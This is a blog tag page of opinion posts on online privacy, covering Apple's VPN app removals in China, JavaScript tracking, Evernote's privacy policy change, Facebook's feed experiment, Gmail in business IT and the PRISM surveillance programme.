Showing all posts tagged privacy:

Sowing Bitter Seeds

The Internet is outraged by… well, a whole lot of things, as usual, but in particular by Apple. For once, however, the issue is not phones that are both unexciting and unavailable, lacking innovation and wilfully discarding convention, and also both over- and under-priced. No, this time the issue is apps, and in particular VPN apps.

Authoritarian regimes around the world (Russia, "Saudi" Arabia, China, North Korea, etc) have long sought to control their populations' access to information in general, and to the Internet in particular. Of course anyone with a modicum of technical savvy - or a friend, relative, or passing acquaintance willing to do the simple setup - can keep unfettered access to the Internet by going through a Virtual Private Network, or VPN.

A VPN does what it says on the tin: it creates a virtual network that connects directly with an endpoint somewhere else; importantly, somewhere outside the authoritarian regime's control. As such, VPNs have always existed in something of a grey area, but now China (the People's Republic, not that other China) has gone ahead and formally banned their use.

In turn, Apple have responded by removing unregistered VPN apps (which in practical terms means all of them) from their App Store in China. In the face of the Internet's predictable outrage, Apple provided this bald statement (via TechChrunch):

Earlier this year China’s MIIT announced that all developers offering VPNs must obtain a license from the government. We have been required to remove some VPN apps in China that do not meet the new regulations. These apps remain available in all other markets where they do business.

Now Apple do have a point; the law is indeed the law, and because they operate in China, they need to enforce it, just as they would with laws in any other country.

Here's the rub, though. By the regionalised way they have set up their App Store service, they have made themselves unnecessarily vulnerable to this sort of arm-twisting by unfriendly governments. Last time I wrote about geo-fencing and its consequences, the cause of the day was Russia demanding removal of the LinkedIn app, and China (them again!) demanding removal of the New York Times app. As I wrote at the time, companies like Apple originally set up the infrastructure for these geographic restrictions to enable IP protection, but the same tools are being repurposed for censorship:

This sort of restriction used to be “just" hostile to consumers. Now, it is turning into a weapon that authoritarian regimes can wield against Apple, Google, and whoever else. Nobody would allow Russia to ban LinkedIn around the world, or China to remove the New York Times app everywhere - but because dedicated App Stores exist for .ru and .cn, they are able to demand these bans as local exceptions, and even defend them as respecting local laws and sensibilities. If there were one worldwide App Store, this gambit would not work.

The argument against the infrastructure of laws and regulations that was put in place to enable (ineffective) IP restrictions was always that it could be, and would be, repurposed to enable repression by authoritarian regimes. People scoffed at these privacy concerns, saying "if you have nothing to hide, you have nothing to fear". But what if your government is the next to decide that reading the NYT or having a LinkedIn profile is against the law? How scared should you be then?

If you are designing a social network or other system with the expectation of widespread adoption, these days this has to be part of your threat model. Otherwise, one day the government may come knocking, demanding your user database for any reason or no reason at all - and what seemed like a good idea at the time will end up messing up a lot of people's lives.

Product designers by and large do not think of such things, as we saw when Amazon decided that it would be perfectly reasonable to give everyone in your address book access to your Alexa device - and make it so users could not turn off this feature without a telephone call to Amazon support.

How well do you think that would go down if you were a dissident, or just in the social circle of one?

Our instinctive attitude to data is to hoard them, but this instinct is obsolete, forged in a time when data were hard to gather, store, and access. It took something on the scale of the Stasi to build and maintain profiles on even six million citizens (out of a population of sixteen million), and the effort and expense was part of what broke the East German regime in the end. These days, it's trivial to build and access such a profile for pretty much anyone, so we need to change our thinking about data - how we gather them, and how we treat them once we have them.

Personal data are more akin to toxic waste, generated as a byproduct of valuable activity and needing to be stored with extreme care because of the dire consequences of any leaks. Luckily, data are different from toxic waste in one key respect: they can be deleted, or better, never gathered in the first place. The same goes for many other choices, such as restricting users to one particular geographical App Store, or making it easy to share your entire contact list (including by mistake), but very difficult to take that decision back.

What other design decisions are being made today based on obsolete assumptions that will come back to bite users in the future?


UPDATE: And there we go, now Russia is following China’s example and banning VPNs as well. The idea of a technical fix to social and legal problems is always a short-term illusion.


Image by Sean DuBois via Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaflling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

How To Lose Friends and Influence People

I am a huge fan of Evernote. I have used their software for many years, and its many features are key parts of my workflow. I take notes on multiple devices, use tagging to sync between those devices, take snapshots of business cards and let the OCR and the access to LinkedIn sort out the details, annotate images and PDFs, and more.

I should say, I used to be a fan of Evernote. They recently made some changes to their privacy policy that have users up in arms. Here is the relevant entry from their changelog:

Privacy Policy

January 23, 2017 updates to the October 4, 2016 version:

We clarified that in building a more personalized Evernote service that can adapt to the way you think and work, a small group of engineers may need to oversee these automated technologies to ensure they are working as intended. Also, we added that we will be using data from other sources to tailor your Evernote experience and explain how you can get more out of your Evernote account. Please see our FAQ for more information on these changes.

Updates to our legal documents | Evernote

This may be fairly inoffensive, but it is worrying to me and to many users. These days, “personalisation" is often code for "gathering data indiscriminately for obscure purposes that may change at any time". This exchange is generally presented as a bargain where users sacrifice (some) privacy to the likes of Google in exchange for free use of their excellent services such as Gmail or Maps.

Evernote's case is different. As a paid app, we users like to assume that we are opting out of that bargain, and paying directly for our services - instead of paying indirectly by authorising Evernote to resell our personal data to advertisers.

In addition, we use Evernote to store data that may be personal, sensitive, or both. Evernote have always had some weasel words in their Privacy Policy about their employees having access to our notes:

  • We believe our Terms of Service has been violated and confirmation is required or we otherwise have an obligation to review your account Content as described in our Terms of Service;
  • We need to do so for troubleshooting purposes or to maintain and improve the Service;
  • Where necessary to protect the rights, property or personal safety of Evernote and its users (including to protect against potential spam, malware or other security concerns); or
  • In order to comply with our legal obligations, such as responding to warrants, court orders or other legal process. We vigilantly protect the privacy of your account Content and, whenever we determine it possible, we provide you with notice if we believe we are compelled to comply with a third party’s request for information about your account. Please visit our Information for Authorities page for more information.

So basically, Evernote employees have always had access to our stuff. This part of the privacy policy has not changed substantially, but the changes are worrying (emphasis mine):

  • New: Do Evernote Employees Access or Review My Data?
  • Old: Do Evernote Employees Access or Review My Notes?

  • New: Below are the limited circumstances in which we may need to access or review your account information or Content:

  • Old: As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service, but we list below the limited circumstances in which our employees may need to access or review your personal information or account Content:

  • New: We need to do so for troubleshooting purposes or to maintain and improve the Service;

  • Old: We need to do so for troubleshooting purposes;

Privacy Policy | Evernote
Privacy Policy - 2017 update

Now, here is why people are all up in arms. We would like service providers to tread extremely carefully when it comes to our personal data, accessing it only when warranted. 2016 has provided plenty of object lessons in why we are so sensitive; just today I received an email from Yahoo detailing their latest hack. Yahoo hack: Should I panic? - BBC News

In this case, Evernote appear to have made two mistakes. First, they designed and built a new functionality that requires access to users’ personal data and content in order to do… well, it’s not entirely clear what they want to do, beyond the fact that it involves machine learning.

Secondly, they completely mis-handled the communication of this change. I mean, they even removed the disclaimer that “As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service"! How tone-deaf can you get?

It’s also very unclear why they even made this change. In their response to the outrage, they say this:

We believe we can make our users even more productive with technologies such as machine learning that will allow you to automate functions you now have to do manually, like creating to-do lists or putting together travel itineraries.

A Note From Chris O’Neill about Evernote’s Privacy Policy

The problem is, users are perfectly capable of managing to-do lists and itineraries, and based on an informal sample of Twitter reactions to this new policy, do not see enough value to want to give unknown Evernote employees access to their data.

An unforced error

This is such a short-sighted decision by Evernote. As one of the few cloud services which is used primarily through fat clients, Evernote is in a privileged position when it comes to pushing processing out to the users’ devices.

Apple have the same advantage, and do the right thing with it: instead of snooping around in my mail and calendar on the server side, my local Mail app can detect dates in messages and offer to create appointments in Calendar. Also, CloudKit’s sync services are encrypted, so nobody at Apple has access to my data - not even if law enforcement asks.

Evernote have chosen not to take that approach, and have not (yet) clarified any benefit that they expect or promise to deliver by doing so. This mis-step has now caused loyal, paying users like me to re-evaluate everything else about the service. At this point, even cancelling the new machine-learning service would not be enough to mollify users; nothing short of a new and explicit commitment to complete encryption of user data - including from Evernote employees! - would suffice.

Evernote's loss will be someone else’s gain

One possible winner from this whole mess is Bear, a new note-taking app that does use CloudKit and therefore is able to provide that encryption at rest that Evernote does not.

Bear - Notes for iPhone, iPad and Mac

The Bear team have even been having some fun on Twitter at Evernote’s expense:

I composed this post in Bear, and I have to say, it is very nice. I copied it over to Evernote to publish here, but it’s the first crack. Before this mess, I was a vocal advocate of Evernote. Now? I am actively evaluating alternatives.

Respect your users, yo.

One more time

I have worked all my career in enterprise IT, either as a sysadmin, or for vendors of enterprise IT tools. There are many annoyances in big-company IT, but one of the most frustrating is when people miss key aspects of what makes corporate IT tick.

One area is the difference between a brand-new startup whose entire IT estate consists of a handful of bestickered MacBooks, and a decades-old corporation with the legacy IT that history brings. Case in point: Google is stealing away Microsoft’s future corporate customers.

Basically, it turns out that - to absolutely nobody's surprise - startups overwhelmingly use Google's email services. Guess what? Running your own email server for just a few users is not a highly differentiating activity, so it makes sense to hand it off to Google. Big companies on the other hand have a legacy that means it makes sense to stick with what they have and know, which generally means Microsoft Exchange.

So far, so good. The key factor that is missing in this analysis is time. What happens when those startups grow to become mid-size companies or even join the Fortune 50 themselves? Do they stick with Google's relatively simple services, or do they need to transition at some point to an "enterprise" email solution?

It is now clear that Google does deep inspection of email contents. So far, this appears to be done for good: Paedophile snared as Google scans Gmail for images of child abuse. However, if I were in a business that competes with Google - and these days, that could be anything - I would feel distinctly uncomfortable about that.

There are also problems of corporate policy and compliance that apply to proper grown-up companies. At the simplest level, people often have their own personal Gmail accounts as well, and with Google's decision to use that login for all their services, there is enormous potential for bleed-over between the two domains. At a more complex level, certain types of data may be required to be stored in such a way that no third parties (such as Google) have access to them. Gmail would not work for that requirement either.

Simply put, startups have different needs from big established corporations. The impact of full-time IT staff on small startup is huge. The alternative of doing your own support doesn't work either, because every hour spent setting up, maintaining or troubleshooting IT infrastructure is an hour that you don't spend working on your actual product. For a big corporation with thousands of employees, on the other hand, it makes a lot of sense to dedicate a few to in-house IT support, especially if the alternatives include major fines or even seeing managers go to jail. The trend Quartz identified is interesting, but it's a snapshot of a point in time. What would be more interesting would be to see the trend as those companies grow and change from one category to another.

Corollary to this is that business IT is not consumer IT. Trying to mix the two is a recipe for disaster. Big B2B vendors end up looking very silly when they try to copy Apple, and journalists look just as silly when they fail to understand key facts about the differences between B2B and consumer IT, and between small-company IT and big-company IT.


Image by Philipp Henzler via Unsplash

Privacy? on the Internet?

Periodically something happens that gets everyone very worked up about privacy online. Of course anyone who has ever administered a mail server has to leave the room when that conversation starts, because our mocking laughter apparently upsets people.1

The latest outrage is that Facebook has apparently been messing with people's feeds. No, I don't mean the stuff about filtering out updates from pages that aren't paying for placement.

No, I don't mean the auto-playing videos either. Yes, they annoy me too.

No, it seems that Facebook manipulated the posts that showed up in certain users' feeds, sending them more negative information to see whether this would affect their mood - as revealed, naturally, through their Facebook postings.

Now, it has long been a truism that online, and especially when it comes to Facebook, privacy is dead. The simplistic response is of course "if you wanted it to be a secret, then why did you share it on Facebook?". This is, of course, a valid point as far as it goes. The problem is that the early assumptions about Facebook no longer hold true.

Time was, Facebook knew about what you did on Facebook, but once you left the site, you were free to get up to things you might not want to share with everybody. Then those "Like" buttons started proliferating everywhere. Brands and website operators wanted to garner "likes" from users to prove their popularity, or at least the effectiveness of their latest marketing gimmick ("like our site for the chance to win an iPad!").

It turns out that on top of tracking what you actually "like", Facebook can track any page you look at that has a Like button embedded. Given that the things are absolutely everywhere, that gives them probably the most complete picture of any ad network out there.

Then Facebook changed their news delivery options. It used to be that "liking" a page meant that you would see all their updates. Now, it means that about 2% of the people who "like" the page see the updates - unless the page operators choose to pay to amplify their reach... Note that these pages do not necessarily belong to brands and advertisers. If your old school has a page that you "like", in the expectation that you will now receive their updates, you're out of luck. Guess you'd better arrange a fundraiser at your next reunion to gather cash to pay Facebook. On the plus side, you have a built-in excuse for poor attendance at the reunion: "ah, I guess they were in the 98% that Facebook didn't deliver the notifications to".

And now Facebook have gone whole-hog, not just preventing information from reaching users' feeds, but actively changing the contents of the users' feeds - in the name of Science, sure.

This is far beyond what people think they have signed up for. There is a big difference between being tracked on Facebook, and being tracked by Facebook, everywhere you go. The difference is not just moral, but commercial. After all, tracking users across multiple websites has been standard operating procedure for ad networks for a long time now. If you've ever shopped online for something and then seen nothing but ads for that one thing for a month thereafter, you have experienced this first-hand. It's mildly creepy, but at this point everyone is pretty well inured to this level of tracking.

Being tracked by ad networks is different from being tracked by Facebook in one very important way. So far, nobody seems to have figured out a good way to make money with content on the internet. A few people do okay with subscriptions, but it tends to be a niche thing. Otherwise, pretty much everything is ad-funded in some way. Now, banner ads can be annoying, and the tracking can get creepy, but at least the money from the ad impressions is going to the site operator, who provides the content that keeps us all coming back.

The "like" button subverts this mechanism, because it's just as creepy and Big-Brotherish, but none of the money goes to the site's operator. All the money and data go only to Facebook, who are even now trying to figure out how to modify your feed to make you want to buy things. Making you feel bad was only step 1, but not everyone goes straight to retail therapy as a remedy. Step 2 is hacking our exocortices (hosted on Facebook) to manipulate the "buy now!" instinct directly.

If you enjoyed this article, please like it on Facebook.


  1. If you don't know what I'm talking about, let's just say I really, really know what I'm talking about when I say you shouldn't send credit card numbers in the clear, and leave it at that. 

Why can't Big Brother ever lift a finger to help out?

It strikes me that the NSA and their counterparts missed a trick.

Maybe it's because I'm in the throes of moving house, with all the associated change-of-address shenanigans, but it strikes me that it would be very useful if the government actually operated a single information repository. I mean, that's what they already do, right?

So, why not do it in a way that serves the public? The government sets up an IDDB which has all of everyone's information in it; so far, so icky. But here's the thing: set it up so that individuals can grant access to specific data in that DB - such as the address. Instead of telling various credit card companies, utilities, magazine companies, Amazon, and everyone else my new address, I just update it in the IDDB, and bam, those companies' tokens automatically update too - assuming I don't revoke access in the mean time.

This could also be useful for all sorts of other things, like marital status, insurance, healthcare, and so on. Segregated, granular access to the information is the name of the game. Instead of letting government agencies and private companies read all the data, users each get access only to those data they need to do their jobs.

People have a problem with any Tom, Dick, or Harry being able to read all their information, but the objection isn't intrinsically to the gathering of the information, it's to the unrestricted access. The idea that any busybody can log in and see any information they care about is what we object to.

Offering an IDDB service would go a long way to solving the PR problem of programmes like PRISM and its ilk. Of course there are enormous issues with abuse of such a system, but since it seems governments cannot be prevented from building (and abusing) these systems anyway, couldn't we at least get some convenience out of it?

Clouded Prism

One of the questions raised as a part of the PRISM discussion has been the impact on the internet and specifically cloud computing industries. For instance, Julie Craig of EMA wrote a post titled “PRISM: The End of the Cloud?

I think these fears are a bit overblown. While there will probably be some blowback, most of the people who care about this sort of thing were already worried enough about the Patriot Act without needing to know more about PRISM. I think the number of people who will start to care about privacy and data protection as a result of PRISM will be fairly small. All Things D's Joy of Tech cartoonnailed it, as usual.

The same kind of thing applies in business. Many companies don't really care very much either way about the government reading their files. They might get more exercised about their competitors having access, but apart from perhaps some financial information, the government is low down the list of potential threats.

Of course, most analysis focuses on the question of US citizens and corporations using US services. What happens in the case of foreign users, whether private or corporate, using US services? There has been some overheated rhetoric on this point as well, but I don't think it's a huge factor. Much like Americans, people in the rest of the world already knew about the Patriot act, and most of them voted with their feet, showing that they did not care. As for corporations, most countries have their own restrictions on what data can be stored, processed or accessed across borders, quite possibly to make it easier to run their own versions of PRISM, so companies are already pretty constrained in terms of what they could even put into these US services.

For companies already using the public cloud or looking into doing so, this is a timely reminder that not all resources are created equal, and that there are factors beyond the purely technical and financial ones that need to be considered. The PRISM story might provide a boost for service providers outside the US, who can carve out a niche for themselves as giving the advantages of public cloud, but in a local or known jurisdiction. This could mean within a specific country, within a wider region such as the EU, or completely offshore. Sealand may have been ahead of its time, but soon enough there must emerge a "Switzerland of the cloud". The argument that only unsavoury types would use such a service doesn't really hold water, given that criminals already have the Russian Business Network and its ilk.

Bottom line, PRISM is nothing new, and it doesn't really bring any new facts. Given the Patriot Act, the sensible assumption had to be that the US government was doing something like this - and so were other technologically sophisticated governments around the world. The only impact it might have is in perception, if it blows up into a big enough story and stays around for long enough. In terms of actual rational grounds for decision-making, my personal expectation is for impact to be extremely limited.